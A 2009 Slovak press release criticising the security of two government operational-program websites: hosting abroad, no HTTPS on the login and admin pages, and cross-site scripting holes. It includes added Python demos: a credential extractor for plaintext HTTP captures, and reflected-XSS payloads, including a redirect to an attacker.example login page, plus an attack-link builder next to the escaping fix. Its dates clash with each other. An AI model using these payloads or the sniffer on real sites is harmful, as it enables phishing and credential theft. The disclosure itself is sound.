Analysis of Security of Operational Programs' Internet Websites
| Date: 2009-11-02
(Reaction to Statements of Construction Minister Igor Stefanov)
On November 30 2009, the Conservative Institute of M. R. Stefanik presented at a news conference the outrageous purchase prices of the websites of the operational programs. The two most expensive sites, www.nsrr.sk and www.ropka.sk, fall under the competence of Slovakia's Ministry of Construction and Regional Development. In statements from November 1 intended to justify the cost of the websites, Construction Minister Igor Stefanov claimed they were expensive because of their security.
We consider this explanation poor and insufficient. The websites are grossly overpriced, and since the construction minister justified their cost by their security, we looked into the matter. We were shocked by our findings. In their light, the waste of public funds is even more visible, as is the lack of professionalism of the selected contractors.
- The first finding was presented at the news conference held on November 30: the sites are hosted on servers in the Czech Republic [1], even though the government has its own high-quality IT infrastructure at its disposal and such hosting can easily be procured in Slovakia. Since the websites are primarily intended for Slovak visitors, we consider hosting them in a neighboring country inefficient and unreasonable.
According to the minister's statement, the website also contains an important reservation system. Despite its importance, neither this system nor any other part of the website is protected by HTTPS (Hypertext Transfer Protocol Secure). Without HTTPS, all data, including logins and passwords, travel in unencrypted form and can be read by anyone on the network path between the visitor and the server, and then exploited by an attacker.
HTTPS is nowadays used not only to protect Internet banking sites but also the most common web services, such as webmail and chat servers. Its use is a basic pillar of Internet security. It is regrettable that such a basic security measure was somehow omitted from the procurement.
As the website's administration interface [2] is itself not protected, there is a real risk that the interface will be misused, as a result of which the ministry may lose control over the contents of its own website. The third point shows that, unfortunately, the ministry has already lost control over its site.
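To make the consequence of the missing HTTPS concrete, here is an added example (our own illustration, not code from the sites or their supplier) that parses a constructed capture of a plain-HTTP login request, the kind of request the reservation system or the /admin interface would accept, and pulls out the credentials exactly as a passive observer on the network path could. The host name, paths, form field names and credentials are invented.

```python
import base64
from urllib.parse import parse_qs

# Constructed captures (not real traffic): a form-based login sent over plain HTTP
# and a request using HTTP Basic authentication. Host, paths and credentials are invented.
CAPTURED_FORM_LOGIN = (
    "POST /admin/login HTTP/1.1\r\n"
    "Host: www.example.sk\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 34\r\n"
    "\r\n"
    "username=editor&password=Tajne1234"
)

CAPTURED_BASIC_AUTH = (
    "GET /admin/ HTTP/1.1\r\n"
    "Host: www.example.sk\r\n"
    "Authorization: Basic " + base64.b64encode(b"editor:Tajne1234").decode() + "\r\n"
    "\r\n"
)

# Assumed form field names; a real sniffer would learn them from the login form itself.
USER_FIELDS = ("username", "user", "login", "email")
PASSWORD_FIELDS = ("password", "passwd", "pass", "heslo")


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).

    Header names are lower-cased so lookups do not depend on the client's spelling.
    """
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_credentials(raw):
    """Return the credentials visible in a plaintext request, or None if there are none.

    Basic authentication is only base64-encoded, not encrypted, so it is decoded
    directly; form logins are read from the URL-encoded body.
    """
    _method, path, headers, body = parse_http_request(raw)

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        decoded = base64.b64decode(auth.split(None, 1)[1]).decode("utf-8", "replace")
        user, _, password = decoded.partition(":")
        return {"path": path, "source": "basic-auth", "user": user, "password": password}

    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body)
        user = next((form[f][0] for f in USER_FIELDS if f in form), None)
        password = next((form[f][0] for f in PASSWORD_FIELDS if f in form), None)
        if user is not None and password is not None:
            return {"path": path, "source": "form", "user": user, "password": password}

    return None


if __name__ == "__main__":
    for capture in (CAPTURED_FORM_LOGIN, CAPTURED_BASIC_AUTH):
        print(extract_credentials(capture))
```

Nothing here has to be "broken": the observer simply reads what passes by. With HTTPS the same request travels inside a TLS connection and the observer sees only the destination host and the amount of data, which is why the absence of HTTPS on a login or administration page is a defect in itself, regardless of how good the rest of the site is.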
The third point contains the most serious findings, which we consider bad enough to serve as grounds for a complaint to the supplier or for withdrawing from the purchase contract. The websites contain several instances of the so-called Cross-Site Scripting vulnerability, or XSS [3].
As a result of these vulnerabilities, anyone can insert pictures, text and other components into the pages without any special hacking or programming skills. An ordinary Internet user can do this from his or her own computer, as a participant in the discussion forum of the SME daily at www.sme.sk [4] pointed out. An unknown participant in that discussion inserted a picture of a railway tunnel [5] into the www.ropka.sk website; www.nsrr.sk suffers from the same vulnerability (see appendices 1 and 2), and possibly other sites from the same supplier do as well.
The bigger problem is that the matter is not limited to harmless playing with a picture. Malicious code can be injected into the page in the same way. An attacker can also redirect visitors to his or her own site (a so-called phishing site [6]) made to look like the original. The attacker can then present false or misleading information, or collect data (personal data, sensitive data, logins, passwords) from visitors who believe they are on the genuine page.
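The mechanism behind the third finding, shown as an added example (our own illustration, not code from the affected sites, whose server-side code we have not seen): a page that reflects a search term into its HTML without escaping, the same page with the term escaped, and the kind of crafted link and payloads described above (one that only adds a picture, one that sends the visitor to a phishing page). The host name, the parameter name and the attacker's addresses are invented.

```python
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Page skeleton that reflects a user-supplied search term. Constructed for the example.
TEMPLATE = (
    "<html><body><h1>Search results</h1>"
    "<p>You searched for: {term}</p>"
    "</body></html>"
)

# Constructed payloads of the two kinds described in the text (not the ones used
# against the real sites): one only adds a picture, the other moves the visitor
# to an attacker-controlled page that can imitate the original.
IMAGE_PAYLOAD = '<img src="http://attacker.example/tunnel.jpg">'
REDIRECT_PAYLOAD = "<script>location.href='http://attacker.example/login'</script>"


def render_vulnerable(term):
    """Insert the term verbatim: the browser interprets any tags it contains (XSS)."""
    return TEMPLATE.format(term=term)


def render_fixed(term):
    """Escape <, >, & and both quote characters so the term is shown as text, not markup."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def build_attack_link(base_url, payload, param="q"):
    """Produce the link an attacker would post on a forum or mail to victims.

    The payload rides in the URL of the genuine site, so the address bar still
    shows the real host when the victim's browser requests the page.
    """
    return base_url + "?" + urlencode({param: payload})


def serve(url, render, param="q"):
    """Simulate the server: take the term from the query string and render the page."""
    term = parse_qs(urlparse(url).query).get(param, [""])[0]
    return render(term)


def contains_active_markup(page):
    """Crude check used only to make the difference visible: is there still an
    unescaped img or script tag that the browser would act on?"""
    lowered = page.lower()
    return "<img" in lowered or "<script" in lowered


if __name__ == "__main__":
    link = build_attack_link("http://www.example.sk/search", REDIRECT_PAYLOAD)
    print(link)
    print(serve(link, render_vulnerable))  # script tag reaches the browser intact
    print(serve(link, render_fixed))       # shown to the visitor as harmless text
```

The example is reflected XSS: the payload arrives in the victim's own request, which is why the attack is spread through links posted in forums or sent by mail. If the site stores submitted text (a reservation note, a comment) and shows it to later visitors, the same missing escaping hits every visitor without any link at all; the fix is identical in both cases, escape every piece of untrusted text at the point where it is written into the page.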
These flaws are serious security vulnerabilities; they show the supplier to be unprofessional and the ministry to have failed to check the delivered product. The websites do not withstand even trivial attacks. Unless the flaws are corrected promptly, it is only a matter of time before they are misused in a serious way.
We think it is high time to stop persuading the public of the advantages and quality of the product and to take action instead. The website www.ropka.sk, worth over SKK 2 million (EUR 76,000), is like a car without brakes: it works and it drives, but it is very dangerous.
For more information or technical details, please contact:
The author of this press release took part in the press conference organized by the Conservative Institute of M. R. Stefanik.
Location of the Websites in the Czech Republic:
The Website's Setup Interface:
- http://www.nsrr.sk/admin (in operation, without HTTPS)
- https://www.nsrr.sk/admin (HTTPS not in operation)
Detailed Description of the XSS vulnerability:
Little Joke by an Anonymous Discussion Participant:
Little Joke by an Anonymous Discussion Participant - Links:
Explanation and possibilities of the use of the so-called “phishing” page:
Altered websites of the operational programs: